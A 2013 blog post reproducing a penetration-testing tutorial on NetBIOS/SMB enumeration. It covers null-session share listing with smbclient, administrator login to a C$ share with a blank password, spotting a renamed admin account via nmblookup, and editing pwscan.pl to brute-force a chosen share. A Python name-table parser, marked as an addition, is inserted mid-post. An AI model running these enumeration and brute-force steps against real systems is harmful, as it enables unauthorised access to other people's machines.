Saturday, 5 January 2013

NetBIOS/SMB (139 TCP)

SMB is used by Windows machines (and, with Samba, even Unix machines) to
communicate. A lot can be done through an open NetBIOS port. The first thing
is to try to find out what shares are advertised on the server. Some servers
are not configured well and will reveal their shares without a username or
password (using a NULL connection).
> smbclient -L 209.xxx.68.66 -n "just a test"
Password: <cr>
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 2.0.3]

        Share name     Type      Comment
        ---------      ----      -------
        winshares      Disk      FreeBSD Samba Server
        IPC$           IPC       IPC Service (Samba 2.0.3)

        Server               Comment
        ---------            -------
        FILES                Samba 2.0.3

        Workgroup            Master
        ---------            -------
        WORKGROUP            FILES
(Note the -n switch - we don't want to call the server with our own server
name, just in case you are running Samba yourself.) As you can see we find
some lovely information on the server - the workgroup/domain name, the
description and the Windows version (the above server was actually a Samba
server). Nice... Of course with a known password, or a blank password,
things are much more fun - you can list all the shares or you might want to
access a drive:
> smbclient \\\\208.xxx.198.71\\c$ -U administrator -n "justatest"
Password: <blank..duh!>
Domain=[xxx] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> ls
  WINNT                   D        0  Fri Oct  8 23:24:02 1999
  NTDETECT.COM         AHSR    26816  Fri Aug 11 01:22:24 2000
  ntldr                AHSR   156496  Fri Aug 11 01:22:24 2000
  boot.ini              ASR      288  Sat Oct  9 00:30:56 1999
  ffastun.ffo            AH   208896  Fri Dec 29 00:35:34 2000
  Program Files           D        0  Fri Oct  8 23:28:10 1999
  CONFIG.SYS              A        0  Fri Oct  8 23:31:46 1999
  AUTOEXEC.BAT            A        0  Fri Oct  8 23:31:46 1999
  IO.SYS               AHSR        0  Fri Oct  8 23:31:46 1999
  MSDOS.SYS            AHSR        0  Fri Oct  8 23:31:46 1999
  TEMP                    D        0  Fri Oct  8 23:31:50 1999
--cut--
You are now dropped into the smbclient "shell". From here you could do file
transfers and the like (see Chapter 6 - what now). You should really be
able to figure out how "smbclient" works on your own...
You might also want to try to collect information with the "nmblookup"
command - it sometimes helps to find the administrator username (if it was
changed):
# nmblookup -A 160.124.19.99
Looking up status of 160.124.19.99
received 10 names
        HUTSI           <00> -         B <ACTIVE>
        SENSEPOST       <00> - <GROUP> B <ACTIVE>
        HUTSI           <20> -         B <ACTIVE>
        HUTSI           <03> -         B <ACTIVE>
        SENSEPOST       <1e> - <GROUP> B <ACTIVE>
        SENSEPOST       <1d> -         B <ACTIVE>
        INet~Services   <1c> - <GROUP> B <ACTIVE>
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>
        IS~HUTSI        <00> -         B <ACTIVE>
        BAAS            <03> -         B <ACTIVE>
Look at the entries marked <03>. Note "BAAS". "Baas" is the renamed
administrator username. So, forget trying to use "administrator" as a
username.
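As an added illustration (not part of the original post), here is a small Python parser for the nmblookup -A name table shown above: it decodes the well-known NetBIOS suffixes and picks out the unique <03> registrations that are not also a host name, which is exactly how the BAAS entry gives the renamed account away, and is a quick way to audit what your own hosts announce. The sample name table is constructed, not captured from a real host.

```python
import re

# Well-known NetBIOS suffixes, keyed by (suffix, is_group registration).
SUFFIXES = {
    ("00", False): "Workstation Service (host name)",
    ("00", True):  "Domain / workgroup name",
    ("01", True):  "Master Browser (__MSBROWSE__)",
    ("03", False): "Messenger Service (host name or logged-on user name)",
    ("1c", True):  "Domain Controllers",
    ("1d", False): "Master Browser",
    ("1e", True):  "Browser Service Elections",
    ("20", False): "File Server Service",
}

# One name-table line: "  NAME  <03> - [<GROUP>] B <ACTIVE>"
LINE_RE = re.compile(r"^\s*(.+?)\s+<([0-9A-Fa-f]{2})>\s+-\s+(<GROUP>\s+)?([BPMH])\s+<(\w+)>.*$")

def parse_name_table(text):
    """Return (name, suffix, is_group, status) for each name-table line; other lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            name, suffix, group, _node_type, status = m.groups()
            entries.append((name.strip(), suffix.lower(), group is not None, status))
    return entries

def describe(entries):
    """Attach the meaning of each registration's suffix."""
    return [(n, s, SUFFIXES.get((s, g), "unknown suffix")) for n, s, g, _ in entries]

def leaked_user_names(entries):
    """Unique <03> names that are not <00> host names are Messenger registrations for logged-on users."""
    hosts = {n for n, s, g, _ in entries if s == "00" and not g}
    return sorted({n for n, s, g, _ in entries if s == "03" and not g and n not in hosts})

# Constructed sample in nmblookup -A format (not output from a real host).
SAMPLE = """\
received 6 names
        SRV01           <00> -         B <ACTIVE>
        EXAMPLEDOM      <00> - <GROUP> B <ACTIVE>
        SRV01           <20> -         B <ACTIVE>
        SRV01           <03> -         B <ACTIVE>
        EXAMPLEDOM      <1e> - <GROUP> B <ACTIVE>
        JDOE            <03> -         B <ACTIVE>
"""

if __name__ == "__main__":
    for name, suffix, meaning in describe(parse_name_table(SAMPLE)):
        print(f"{name:<14} <{suffix}>  {meaning}")
    print("user names exposed:", leaked_user_names(parse_name_table(SAMPLE)))
```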
You also want to have a look at VLAD (yet again). The pwscan.pl script does
a good job of brute-forcing NetBIOS (run it with the -v and -B switches). The
pwscan.pl script actually uses the "smbclient" command and inspects the
output to find a valid username & password combination. If you want to
brute-force a specific share, you will need to modify these lines (starting
at line 610 in version 1.17):
$cmd     = "smbclient";
$service = "//".$target."/ipc\$";
@args    = ($service, "'".$pass."'",
            "-U", $user);
$s       = Expect->spawn($cmd, @args);

to read something like

$cmd     = "smbclient";
$service = "//".$target."/sharename";   # the share to test instead of IPC$
@args    = ($service, "'".$pass."'",
            "-U", $user);
$s       = Expect->spawn($cmd, @args);
An excellent paper on NetBIOS and the CIFS protocol by Hobbit can be found
at http://packetstorm.securify.com/docs/infosec/cifs.txt. You really should
try to read it.
Added: you should really look at a tool called CIS by David Litchfield
(nowadays with @stake). It does a lot of cool stuff - and it does wonders
for SMB.
